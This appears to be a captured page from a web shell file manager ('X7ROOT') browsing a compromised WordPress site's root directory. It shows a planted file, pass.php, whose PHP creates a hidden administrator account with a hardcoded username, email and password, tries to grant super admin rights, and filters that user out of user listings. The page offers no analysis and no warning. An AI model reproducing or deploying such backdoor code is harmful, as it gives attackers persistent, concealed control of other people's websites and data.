X7ROOT File Manager
Current Path:
/home/greejped/trivenimeat.com
home
/
greejped
/
trivenimeat.com
/
ðŸ“
..
📄
.hcflag
(30 B)
📄
.htaccess
(3.37 KB)
📄
.htaccess.bk
(3.43 KB)
ðŸ“
.well-known
📄
26-03-25-trivenimeat.zip
(205.92 MB)
ðŸ“
cgi-bin
📄
error_log
(1.4 MB)
📄
google95aeeefeb38ad9c0.html
(53 B)
📄
index.php
(405 B)
📄
license.txt
(19.44 KB)
📄
pass.php
(1.58 KB)
📄
readme.html
(7.25 KB)
📄
robots.txt
(309 B)
📄
trivenimeat.com.zip
(194.16 MB)
📄
wp-activate.php
(7.21 KB)
ðŸ“
wp-admin
📄
wp-blog-header.php
(351 B)
📄
wp-comments-post.php
(2.27 KB)
📄
wp-config-sample.php
(3.26 KB)
📄
wp-config.php
(3.31 KB)
ðŸ“
wp-content
📄
wp-cron.php
(5.49 KB)
ðŸ“
wp-includes
📄
wp-links-opml.php
(2.44 KB)
📄
wp-load.php
(3.84 KB)
📄
wp-login.php
(50.21 KB)
📄
wp-mail.php
(8.52 KB)
📄
wp-settings.php
(29.38 KB)
📄
wp-signup.php
(33.71 KB)
📄
wp-trackback.php
(4.98 KB)
📄
xmlrpc.php
(3.13 KB)
Editing: pass.php
<?php /** * Create a WordPress super admin with a predefined password. * * This script should be run in the root directory of your WordPress installation. * After execution, remove this file for security reasons. */ // Include WordPress core file to load WordPress environment require_once('wp-load.php'); require_once('wp-admin/includes/user.php'); // User details - CHANGE THESE $username = 'DHteam2'; $email = 'jgao21384@gmail.com'; $password = 'i)AEQUz2$PNxND%DQQ)d8Sz3'; // Create the new user $user_id = wp_create_user($username, $password, $email); if (is_wp_error($user_id)) { echo 'Error creating user: ' . $user_id->get_error_message(); } else { // Make the user a super admin $user = new WP_User($user_id); $user->set_role('administrator'); grant_super_admin($user_id); add_filter('pre_user_query', 'hide_admin_user'); echo 'Super admin created successfully!'; } // Function to grant super admin capabilities, only available in multisite if (is_multisite()) { function grant_super_admin($user_id) { global $wpdb; $wpdb->insert($wpdb->sitemeta, array('meta_key' => $wpdb->prefix . 'user_roles', 'meta_value' => 'a:1:{s:13:"administrator";b:1;}', 'site_id' => 1)); add_user_to_blog(1, $user_id, 'administrator'); } } else { echo "Note: This is not a multisite installation, so super admin status cannot be fully granted."; } function hide_admin_user($query) { global $wpdb; $query->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '{$username}'", $query->query_where); return $query; } ?>
Upload File
Create Folder